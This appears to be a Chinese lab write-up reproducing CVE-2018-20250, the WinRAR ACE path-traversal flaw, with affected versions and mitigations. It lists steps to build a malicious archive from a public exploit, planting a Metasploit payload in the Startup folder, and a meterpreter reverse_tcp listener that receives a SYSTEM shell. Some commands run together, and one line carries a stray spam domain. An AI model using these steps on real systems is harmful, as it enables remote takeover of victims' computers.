WinRAR目录穿越漏洞

发布时间:2020-08-10 23:23:15 作者:专注的阿熊
来源:ITPUB博客 阅读:158

  该漏洞是由于WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,该动态链接库在2006 年被编译,没有任何的基础保护机制(ASLR,DEP 等)。该动态链接库的作用是处理ACE 格式文件。而在解压处理过程中存在一处目录穿越漏洞,允许解压过程写入文件至开机启动项,导致代码执行

漏洞编号: CVE-2018-20250

影响版本:

    WinRAR < 5.70 Beta 1

    Bandizip < = 6.2.0.0

    好压(2345压缩) < = 5.9.8.10907

    360压缩 < = 4.0.0.1170

WinRAR目录穿越漏洞
复现环境

WinRAR目录穿越漏洞

exp下载:

https://github.com/WyAtu/CVE-2018-20250/
WinRAR目录穿越漏洞
复现过程

1.使用Metasploit生成Payload

WinRAR目录穿越漏洞

WinRAR目录穿越漏洞

2.使用exp生成恶意程序

cd /root/Desktopgit clone https://github.com/WyAtu/CVE-2018-20250.gitcd CVE-2018-20250cp /root/WinRAR.exe ./vim exp.py

将exp.py中的evil_filename = “calc.exe”改为”WinRAR.exe”

WinRAR目录穿越漏洞

将CVE-2018-20250文件夹复制到Windows10中执行 

WinRAR目录穿越漏洞

3.在靶机上运行恶意程序

将test.rar 投放到win8上 解压运行

4.在kali上监听metasploit

msf exploit(handler) > set payload windows/meterpreter/reverse_tcpmsf exploit(handler) > set lhost 192.168.112.140msf exploit(handler) > set lport 44444msf exploit(handler) > run www.gendan5.com

WinRAR目录穿越漏洞

5.控制靶机

Win8重启之后 kali会接受到会话 此时执行shell

进入到win8系统的system权限

WinRAR目录穿越漏洞

WinRAR目录穿越漏洞
漏洞防御

1. 删除受影响压缩软件目录下UNACEV2.dll文件能有效防御

2. 升级到最新版本,WinRAR 目前版本是 5.70 Beta 1

3. 总而言之,该漏洞并没有那么致命。目标性的打站,得先欺骗下载,并再在未防护的服务器上解压,企业服务器管理员都很难会这样做。而且必须得服务器重启才能生效,不能直接执行脚本

推荐阅读:
  1. 目录浏览漏洞修复建议
  2. 如何进行疑似APT-C-27利用WinRAR漏洞的定向攻击活动分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

winrar 漏洞 目录

上一篇:MySQL:count(*) count(字段) 实现上区别

下一篇:中年苏宁负重前行

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》